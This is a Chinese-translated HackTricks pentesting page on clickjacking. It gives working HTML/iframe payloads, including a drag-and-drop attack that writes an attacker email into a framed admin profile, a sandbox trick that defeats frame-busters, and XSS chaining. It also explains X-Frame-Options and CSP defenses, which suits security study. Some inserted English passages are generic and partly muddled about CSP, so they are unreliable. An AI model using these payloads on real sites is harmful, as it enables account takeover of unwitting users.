hacktricks/pentesting-web/clickjacking.md

15 KiB
Raw Blame History

点击劫持

☁️ HackTricks 云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 YouTube 🎥


使用 Trickest 可以轻松构建和自动化由全球最先进的社区工具提供支持的工作流程。
立即获取访问权限:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

什么是点击劫持

点击劫持是一种攻击,它通过欺骗用户点击一个不可见或伪装成其他元素的网页元素。这可能导致用户不知情地下载恶意软件、访问恶意网页、提供凭据或敏感信息、转账或在线购买产品。(来自这里)。

预填表单的技巧

有时可以在加载页面时使用 GET 参数来填充表单字段的值。攻击者可以利用这种行为填充表单的任意数据,并发送点击劫持有效负载,以便用户按下提交按钮。

使用拖放填充表单

如果你需要用户填写一个表单,但又不想直接要求他写入一些特定的信息(比如你知道的电子邮件或特定密码),你可以要求他拖放某个东西,这个东西将写入你控制的数据,就像这个例子中的那样。

基本有效负载

<style>
iframe {
position:relative;
width: 500px;
height: 700px;
opacity: 0.1;
z-index: 2;
}
div {
position:absolute;
top:470px;
left:60px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="https://vulnerable.com/email?email=asd@asd.asd"></iframe>

多步骤有效载荷

Clickjacking attacks can be made more complex by using a multistep payload. In a multistep payload, the attacker tricks the victim into performing multiple actions without their knowledge.

For example, the attacker may create a malicious webpage that contains an invisible button overlaying a legitimate button on a target website. When the victim clicks on the legitimate button, they are actually clicking on the invisible button, which triggers a series of actions.

The multistep payload can be used to perform various malicious activities, such as:

  1. Unauthorized actions: The attacker can trick the victim into performing actions that they did not intend to, such as making a purchase, changing account settings, or deleting data.

  2. Social engineering: The attacker can use the multistep payload to manipulate the victim into revealing sensitive information or performing actions that compromise their security.

  3. Exploiting vulnerabilities: By combining multiple actions, the attacker can exploit vulnerabilities in the target website or application, gaining unauthorized access or executing arbitrary code.

To create a multistep payload, the attacker needs to carefully plan and sequence the actions to achieve their desired outcome. This may involve chaining together multiple clickjacking attacks or combining clickjacking with other attack techniques.

Protecting against multistep payloads requires implementing proper security measures, such as:

  • Frame busting: Using frame-busting techniques can prevent the attacker from embedding the target website within an iframe, making clickjacking attacks more difficult.

  • Content Security Policy (CSP): Implementing a strict CSP can restrict the sources from which the target website can be loaded, preventing clickjacking attacks.

  • User awareness: Educating users about the risks of clickjacking and advising them to be cautious when interacting with unfamiliar websites can help prevent multistep payload attacks.

By understanding and being aware of the potential dangers of multistep payloads, both website owners and users can take steps to mitigate the risks and protect themselves from clickjacking attacks.

<style>
iframe {
position:relative;
width: 500px;
height: 500px;
opacity: 0.1;
z-index: 2;
}
.firstClick, .secondClick {
position:absolute;
top:330px;
left:60px;
z-index: 1;
}
.secondClick {
left:210px;
}
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://vulnerable.net/account"></iframe>

拖放 + 点击有效载荷

Clickjacking attacks can be enhanced by combining them with drag and drop functionality. This technique involves tricking the user into performing a drag and drop action on a hidden element, which triggers a click event on a target element. By doing so, an attacker can execute malicious actions on behalf of the user without their knowledge.

To implement this attack, the attacker needs to create a hidden element on the page, such as an invisible iframe or a transparent div. This element is positioned on top of a target element that the attacker wants the user to interact with. The hidden element is then set to capture the drag and drop events.

When the user performs a drag and drop action on the visible target element, the hidden element intercepts the event and triggers a click event on the target element. This click event can be used to perform actions such as submitting forms, clicking on buttons, or even making requests to external resources.

To protect against drag and drop + click payloads, web developers should implement measures such as frame-busting techniques, which prevent the page from being loaded within an iframe. Additionally, the X-Frame-Options header can be used to restrict the embedding of a page within an iframe.

By being aware of this technique, both developers and users can take steps to mitigate the risk of clickjacking attacks combined with drag and drop functionality.

<html>
<head>
<style>
#payload{
position: absolute;
top: 20px;
}
iframe{
width: 1000px;
height: 675px;
border: none;
}
.xss{
position: fixed;
background: #F00;
}
</style>
</head>
<body>
<div style="height: 26px;width: 250px;left: 41.5%;top: 340px;" class="xss">.</div>
<div style="height: 26px;width: 50px;left: 32%;top: 327px;background: #F8F;" class="xss">1. Click and press delete button</div>
<div style="height: 30px;width: 50px;left: 60%;bottom: 40px;background: #F5F;" class="xss">3.Click me</div>
<iframe sandbox="allow-modals allow-popups allow-forms allow-same-origin allow-scripts" style="opacity:0.3"src="https://target.com/panel/administration/profile/"></iframe>
<div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'attacker@gmail.com')"><h3>2.DRAG ME TO THE RED BOX</h3></div>
</body>
</html>

XSS + Clickjacking

如果你发现了一个需要用户点击某个元素来触发的 XSS 攻击,而且页面容易受到点击劫持的影响,你可以利用这个漏洞来欺骗用户点击按钮或链接。
例子:
你在账户的某些私人详细信息中发现了一个 自我 XSS(只有你可以设置和读取的详细信息)。用于设置这些详细信息的页面容易受到点击劫持的影响,你可以使用 GET 参数预填充表单
__攻击者可以准备一个 点击劫持 攻击,将 XSS 载荷预填充到表单中,并欺骗用户提交表单。因此,当表单被提交并且值被修改时,用户将执行 XSS。

如何避免点击劫持

客户端防御

可以在客户端执行脚本来执行以下行为,以防止点击劫持:

  • 检查并强制当前应用窗口为主窗口或顶层窗口,
  • 使所有框架可见,
  • 防止点击不可见的框架,
  • 拦截并标记用户可能遭受的点击劫持攻击。

绕过

由于框架破坏器是 JavaScript因此浏览器的安全设置可能会阻止其运行或者浏览器甚至可能不支持 JavaScript。攻击者对框架破坏器的有效绕过方法是使用 HTML5 iframe 的 sandbox 属性。当设置了 allow-formsallow-scripts 值,并且省略了 allow-top-navigation 值时,框架破坏器脚本将被中和,因为 iframe 无法检查自己是否为顶层窗口:

<iframe id="victim_website" src="https://victim-website.com" sandbox="allow-forms allow-scripts"></iframe>

allow-formsallow-scripts值都允许在iframe内执行指定的操作但禁用顶级导航。这样可以阻止破坏框架的行为同时允许在目标站点内使用功能。

根据执行的Clickjacking攻击类型您可能还需要允许allow-same-originallow-modals更多。在准备攻击时,只需检查浏览器的控制台,它可能会告诉您需要允许哪些其他行为。

X-Frame-Options

X-Frame-Options HTTP响应头可用于指示浏览器是否允许<frame><iframe>中呈现页面。网站可以使用此功能来避免Clickjacking攻击确保其内容不被嵌入到其他站点中。为所有包含HTML内容的响应设置**X-Frame-Options**头。可能的值包括:

  • X-Frame-Options: deny防止任何域嵌入内容推荐的值
  • X-Frame-Options: sameorigin,仅允许当前站点嵌入内容。
  • X-Frame-Options: allow-from https://trusted.com**允许指定的'uri'**嵌入此页面。
  • 请检查下面的限制,因为如果浏览器不支持它,这将导致失败
  • 其他浏览器支持新的CSP frame-ancestors指令。有些浏览器同时支持两者。

内容安全策略CSPframe-ancestors指令

推荐的Clickjacking保护是将**frame-ancestors指令**纳入应用程序的内容安全策略中。
**frame-ancestors 'none'指令的行为类似于X-Frame-Options deny**指令(没有人可以嵌入页面)。
**frame-ancestors 'self'指令与X-Frame-Options sameorigin**指令大致相同(只有当前站点可以嵌入)。
frame-ancestors trusted.com指令与X-Frame-Options allow-from指令大致相同(只有受信任的站点可以嵌入)。

以下CSP将仅允许来自同一域的框架

Content-Security-Policy: frame-ancestors 'self';

有关更多详细信息和更复杂示例,请参阅以下文档:

限制

  • **浏览器支持:**CSP frame-ancestors尚未得到所有主要浏览器的支持。
  • **X-Frame-Options优先**CSP规范的“与X-Frame-Options的关系”部分https://w3c.github.io/webappsec/specs/content-security-policy/#frame-ancestors-and-frame-options)指出:“如果资源使用包含名为frame-ancestors的指令的策略传递并且其处理方式为“强制执行”则必须忽略X-Frame-Options头部但Chrome 40和Firefox 35会忽略frame-ancestors指令而是遵循X-Frame-Options头部。

参考资料


使用Trickest轻松构建和自动化工作流程,使用全球最先进的社区工具。
立即获取访问权限:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥